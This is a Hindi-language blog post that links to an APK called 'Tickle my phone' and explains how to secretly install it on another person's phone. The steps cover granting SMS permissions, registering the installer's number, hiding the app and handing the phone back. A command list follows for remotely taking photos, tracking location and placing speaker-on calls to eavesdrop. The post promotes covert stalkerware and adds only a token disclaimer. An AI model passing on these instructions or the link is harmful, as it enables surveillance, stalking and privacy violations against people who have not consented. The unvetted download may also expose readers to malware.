Tickle my phone mobile hack (2021)

Pawanhacker.com
0

 



                   🔗Tickle my phone link🔗 


https://www.mediafire.com/file/yyv08bbjbfrjfpv/tickle+my+phone+by+PAWAN+HACKER+.apk/file



                              ⚠️details⚠️


यह app बहुत ही गैरकानूनी माना जाता है इसलिए यह app आपको प्ले स्टोर पर नहीं मिलेगा तो  इसे आपको मेरे लिंक से ही डाउनलोड करना पड़ेगा इस ऐप से आप किसी की भी कॉल रेकॉर्डिंग हैक कर सकते हो फोटो  हैक कर सकते  हो वीडियो  भी हैक कर सकते हो  और भी खतरनाक फ्यूचर है यह फ्यूचर में आपको अभी नहीं बता सकता क्योंकि यह बहुत ही खतरनाक है आप इस ऐप को डाउनलोड करोगे तो आपको पता चल जाएगा इस ऐप को कैसे डाउनलोड करना है कैसे यूज़ करना है मैंने नीचे  step  बाय step बताया है आप step  को फॉलो करें


Step 1  यह  app आपको प्ले स्टोर पर नहीं मिलेगा तो आप इसे मेरे लिंक से डाउनलोड कर ले डाउनलोड करने के बाद इसे ओपन करें  

 👇👇 तब आपको इस तरह का  page दिखाई देगा👇👇




      ❌❌ तब आप  I Accept  पर क्लिक करें❌❌


Step 2  उसके बाद आपके सामने

           

             👇👇ऐसा वाला ऑप्शन आएगा👇👇



  ❌तब आप Sms/text message पर क्लिक करें ❌



Step 3 अब आपके सामने 


              👇👇ऐसा वाला ऑप्शन आएगा👇👇




     


❌❌तब आप setting  वाले ऑप्शन पर क्लिक करें❌❌



Step 4 फिर आपके सामने 

     

              👇👇यह वाला ऑप्शन आएगा👇👇




❌तब आप Allow/ Disallow number पर क्लिक करें❌


 Step 5 फिर इसमें आप अपना मोबाइल नंबर डाल दें जिस नंबर से आप कमांड या मैसेज भेजना चाहते हो और सब काम खत्म होने के बाद आप इसे एप को हाइड कर दें हाइड करने का ऑप्शन इसके अंदर ही है 

     

    ❌❌ऑप्शन कुछ इस प्रकार का दिखाई देता❌❌




हाइड होने के बाद आपका काम खत्म उस बंदे को उसका मोबाइल वापिस दे दे



Step 6  अब आप अपना मोबाइल लीजिए और  उस बंदे के मोबाइल नंबर पर मैसेज करें कौन से मैसेज का क्या मतलब होता है मैंने नीचे कमांड में बताया है👇👇👇👇👇👇👇


                            

                    ❌❌Comands list❌❌



1 Call Back 

2 Call Back Speaker ON 

3 Vibrate

4 Vibrate N Seconds 

5 Popup Settings 

6 Play Default Ringtone 

7 SMS Acknowledgement 

8 Call Number 

9 Call Number speaker on 

10 Where Are You 

11 Take photo 

12 Take Live Picture and send image


 आशा करता हूं आप  इस ऐप का गलत यूज  नहीं करेंगे अगर आपने इसे  ऐप का गलत यूज़ किया तो इसमें मेरी और मेरे चैनल की कोई जिम्मेदारी नहीं होगी आप से मेरी यही रिक्वेस्ट है कि आप इस ऐप का गलत  यूज ना करें  और मेरे चैनल को सब्सक्राइब करें

My YouTube channel link https://youtube.com/channel/UCJWx06pWc7HjJru-lEh9J5g

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.
Post a Comment (0)